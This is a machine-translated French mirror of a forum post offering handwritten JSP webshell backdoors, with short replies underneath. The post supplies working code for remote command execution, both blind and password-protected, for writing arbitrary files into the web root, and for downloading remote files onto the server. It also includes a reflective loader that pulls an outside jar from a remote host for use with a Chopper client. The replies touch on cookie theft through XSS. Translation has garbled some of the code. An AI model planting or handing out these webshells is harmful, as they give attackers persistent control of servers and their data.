Cet article est un article miroir de traduction automatique, veuillez cliquer ici pour accéder à l’article original.

Vue: 14991|Répondre: 7

[Outils de sécurité] Porte dérobée JSP manuscrite

[Copié le lien]
Publié sur 02/01/2015 18:46:57 | | | |
Transféré depuis : http://p2j.cn/?p=1627
1. Exécuter les commandes système :
Exécuter les commandes système sans écho :
< %Runtime.getRuntime().exec(request.getParameter(« i »)) ;%>
Demande : http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Il n’y aura pas d’écho après l’exécution, ce qui est très pratique pour les coquilles rebondissantes.
Il y a des échos avec la vérification des mots de passe :
< % if(« 023 ».equals(request.getParameter(« pwd »)){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(« i »)).getInputStream() ;        int a = -1 ;        octet[] b = nouvel octet[2048] ;        out.print(« <pre> ») ;        while((a=in.read(b)) !=-1){ out.println(new String(b)) ;        } out.print(« </pre> ») ;    }%>
Demande : http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Encodez la chaîne et écrivez-la dans le fichier spécifié :
1:
< %new java.io.FileOutputStream(request.getParameter(« f »).write(request.getParameter(« c »).getBytes()) ;%>
Demande : http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Écrivez dans le répertoire web :
< %new java.io.FileOutputStream(application.getRealPath(« / »)+"/"+request.getParameter(« f »)).write(request.getParameter(« c »).getBytes() ;%>
Demande : http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
< %new java.io.RandomAccessFile(request.getParameter(« f »),"rw »).write(request.getParameter(« c »).getBytes()) ; %>
Demande : http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Écrivez dans le répertoire web :
< %new java.io.RandomAccessFile(application.getRealPath(« / »)+"/"+request.getParameter(« f »),"rw »).write(request.getParameter(« c »).getBytes()) ; %>
Demande : http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3 : Télécharger le fichier distant (si vous n’utilisez pas les utilitaires Apache IO, vous ne pouvez pas convertir le flux d’entrée en octet, donc il est très long...)
< % java.io.InputStream in = new java.net.URL(request.getParameter(« u »).openStream() ;    octet[] b = nouvel octet[1024] ;    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream() ;    int a = -1 ;    tandis que ((a = in.read(b)) != -1) { baos.write(b, 0, a) ;    } new java.io.FileOutputStream(request.getParameter(« f »)).write(baos.toByteArray()) ; %>
Demande : http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Téléchargez sur le chemin web :
< % java.io.InputStream in = new java.net.URL(request.getParameter(« u »).openStream() ;    octet[] b = nouvel octet[1024] ;    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream() ;    int a = -1 ;    tandis que ((a = in.read(b)) != -1) { baos.write(b, 0, a) ;    } new java.io.FileOutputStream(application.getRealPath(« / »)+"/"+ request.getParameter(« f »)).write(baos.toByteArray()) ; %>
Demande : http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Quatre : La réflexion appelle le bocal extérieur, parfait la porte arrière
Si vous n’aimez pas la fonction de porte dérobée ci-dessus qui est trop faible et dépassée, vous pouvez essayer ceci :
< %=Class.forName(« Load »,true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter(u »))}).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()}) %>
Demande : http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Connexion couteau de cuisine : http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, mot de passe 023.

Solution :
Utilisez la réflexion pour charger un jar externe dans l’application courante, et la réflexion exécute le résultat du traitement de sortie. request.getParameterMap() contient tous les paramètres demandés. Puisque le package jar externe est chargé, le serveur doit pouvoir accéder à cette adresse jar.




Précédent:La crise derrière le fichier texte TXT
Prochain:Chiffrement Java MD5, chiffrement et déchiffrement Base64 Java exécute le code source des commandes système
Publié sur 02/01/2015 20:17:30 |
Vous avez récemment fait des recherches sur la porte dérobée JSP ?
 Propriétaire| Publié sur 02/01/2015 20:39:44 |
admin publié le 2015-1-2 à 20:17
Vous avez récemment fait des recherches sur la porte dérobée JSP ?

As-tu déjà vu jsp en une phrase ? Je l’ai trouvé, je ne l’ai pas étudié en profondeur, je ne comprenais pas xss, j’ai enfin reçu les cookies hier, et je ne sais pas comment modifier le téléchargement des cookies
Publié sur 02/01/2015 20:44:40 |
Delver_Si Posté le 2015-1-2 à 20:39
As-tu déjà vu jsp en une phrase ? Je l’ai trouvé, je n’ai pas creusé plus profondément, je n’ai pas compris xss, j’ai enfin eu les cookies hier, je ne sais pas comment modifier la cuisson...

Ce ne seront pas mes cookies volés avec un fichier de signature personnalisé,,,

Utilisez le plugin HackBar de Firefox
Publié sur 02/01/2015 20:48:57 |
Delver_Si Posté le 2015-1-2 à 20:39
As-tu déjà vu jsp en une phrase ? Je l’ai trouvé, je n’ai pas creusé plus profondément, je n’ai pas compris xss, j’ai enfin eu les cookies hier, je ne sais pas comment modifier la cuisson...

Navigateur multifonctionnel Ghost Brother v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Nombre de téléchargements: 7, Prix de vente: 1 Grain MB)
 Propriétaire| Publié sur 02/01/2015 20:57:50 |
admin publié le 2015-1-2 20:44
Ce ne seront pas mes cookies volés avec un fichier de signature personnalisé,,,

Utilisez le plugin HackBar de Firefox

Hier, la porte libre était convulsive, je ne pouvais pas me connecter, et je ne pouvais pas accéder au magasin Firefox.
 Propriétaire| Publié sur 02/01/2015 20:59:01 |
admin publié le 2015-1-2 20:44
Ce ne seront pas mes cookies volés avec un fichier de signature personnalisé,,,

Utilisez le plugin HackBar de Firefox

DZ n’a pas cette faille
Publié sur 02/01/2015 21:00:22 |
Delver_Si Publié le 2015-1-2 20:59
DZ n’a pas cette faille

Je ne sais pas, tu peux tester, ne bousille pas ma base de données   

Nous utilisons tous Tor Browser pour contourner le mur

Démenti:
Tous les logiciels, supports de programmation ou articles publiés par Code Farmer Network sont uniquement destinés à l’apprentissage et à la recherche ; Le contenu ci-dessus ne doit pas être utilisé à des fins commerciales ou illégales, sinon les utilisateurs assumeront toutes les conséquences. Les informations sur ce site proviennent d’Internet, et les litiges de droits d’auteur n’ont rien à voir avec ce site. Vous devez supprimer complètement le contenu ci-dessus de votre ordinateur dans les 24 heures suivant le téléchargement. Si vous aimez le programme, merci de soutenir un logiciel authentique, d’acheter l’immatriculation et d’obtenir de meilleurs services authentiques. En cas d’infraction, veuillez nous contacter par e-mail.

Mail To:help@itsvse.com